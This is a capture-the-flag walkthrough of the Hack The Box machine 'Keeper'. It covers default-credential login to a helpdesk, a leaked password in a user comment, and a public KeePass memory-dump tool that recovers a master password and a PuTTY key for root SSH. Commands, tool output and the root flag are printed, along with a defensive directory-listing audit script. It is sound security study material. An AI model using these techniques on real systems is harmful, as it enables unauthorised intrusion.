
HTB: Keeper

Keeper is an easy HTB machine which mimics a helpdesk. I get initial access with default credentials. With that I find a comment which reveals a password that I use to log in over SSH. I then use an exploit on the KeePass dump file, which gives me root's PuTTY SSH key.

Initial enumeration

I start with an nmap scan:

sudo nmap -sVC -v 10.10.11.227 -oN nmap/all

It shows ports 22, 80 and 8000 open.


PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.10.12)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 8000

A Python SimpleHTTPServer is running on port 8000, and it shows a directory listing of files.
https://i.imgur.com/3mpV4mS.png

Users flag

Here it shows the user's flag!
https://i.imgur.com/SLZmARN.png
I download the other files to my Linux machine. The passcodes.kdbx and KeePassDumpFull.dmp files stand out (the RT30000.zip file also contains these files).
I tried keepass2john to brute-force the database, but got no results.
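The underlying exposure here is a home directory served with directory listing enabled, so anyone browsing port 8000 can spot the KeePass database and the memory dump. As an added aside, not part of the original writeup, here is a small audit check that parses a Python http.server style listing and flags file names a defender would not want reachable from a web root; the listing HTML is constructed to mirror what the box showed:

```python
from html.parser import HTMLParser
import re

# Constructed sample of a Python http.server directory listing (not captured
# from the box); the file names mirror the ones seen on port 8000.
SAMPLE_LISTING = """<!DOCTYPE HTML>
<html><head><title>Directory listing for /</title></head>
<body><h1>Directory listing for /</h1><hr><ul>
<li><a href="KeePassDumpFull.dmp">KeePassDumpFull.dmp</a></li>
<li><a href="passcodes.kdbx">passcodes.kdbx</a></li>
<li><a href="RT30000.zip">RT30000.zip</a></li>
<li><a href="user.txt">user.txt</a></li>
<li><a href="notes/">notes/</a></li>
</ul><hr></body></html>"""

# File-name patterns that indicate secrets exposed through a web listing.
SENSITIVE = [
    (re.compile(r"\.kdbx?$", re.I), "KeePass database"),
    (re.compile(r"\.dmp$", re.I), "process memory dump (may hold secrets in cleartext)"),
    (re.compile(r"\.(zip|tar|tgz|gz|7z)$", re.I), "archive (may bundle the above)"),
    (re.compile(r"^(id_(rsa|ed25519|ecdsa)|.*\.ppk|.*\.pem)$", re.I), "SSH/PuTTY private key"),
]

class _LinkCollector(HTMLParser):
    """Collects every href from the <a> tags of the listing."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)

def audit_listing(html):
    """Return [(file_name, reason)] for listing entries that look like exposed secrets."""
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href in parser.hrefs:
        if href.endswith("/"):          # sub-directories are not files; skip them
            continue
        name = href.rsplit("/", 1)[-1]  # keep only the file name part of the link
        for pattern, reason in SENSITIVE:
            if pattern.search(name):
                findings.append((name, reason))
                break                   # one reason per file is enough
    return findings

if __name__ == "__main__":
    for name, reason in audit_listing(SAMPLE_LISTING):
        print(f"{name}: {reason}")
```

The same function can be fed the HTML fetched from any internal host that exposes a listing, which is a cheap way to catch this kind of accidental share before someone else does.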

I didn't have KeePass yet, so I downloaded it from https://keepassxc.org/

For now I wanted to continue exploring the other ports.

Port 80

Web page shows the following
https://i.imgur.com/LCikFbg.png

I add tickets.keeper.htb to my /etc/hosts file.

It displays the following page:
https://i.imgur.com/BtPrrJf.png
After trying some default usernames and passwords, it lets me in with root:password.
https://i.imgur.com/2G4ka4B.png
On the users page, it shows two users.
https://i.imgur.com/THMPiXM.png

Initial password

On lnorgaard's user page, there is a comment that reveals an initial password.
https://i.imgur.com/lrfHGw8.png

Shell as lnorgaard

I try to connect via ssh and it works!

ls -la shows that lnorgaard's home directory is the directory being served by the Python HTTP server on port 8000.
https://i.imgur.com/uqGlsho.png

Shell as root

After searching online for what I could do with the KeePassDumpFull.dmp file, I stumbled upon the following GitHub script:
https://github.com/CMEPW/keepass-dump-masterkey


python3 poc.py ~/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp 
2023-09-01 14:07:59,930 [.] [main] Opened /home/fabian/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de

Putting the fragments together gives rodgrod med flode. A Google search shows that this is a Danish dish.
https://i.imgur.com/qV08Aif.png

With that in hand, I managed to unlock the database file!
https://i.imgur.com/TOWVnab.png

I installed PuTTY on Linux with sudo apt install putty

I copied the notes field of the entry (the PuTTY private key) to a file named putty_key.
https://i.imgur.com/CRaDaPo.png

Then I use puttygen with -O private-openssh to specify the output type, converting the PuTTY key into an OpenSSH private key:


puttygen putty_key -O private-openssh -o new_ssh_key

Then I use ssh with new_ssh_key to connect as root:


ssh -i ./new_ssh_key root@10.10.11.227

And I successfully found the root flag!


root@keeper:~# cat root.txt 
e205f760f01c160cd091fec25090159c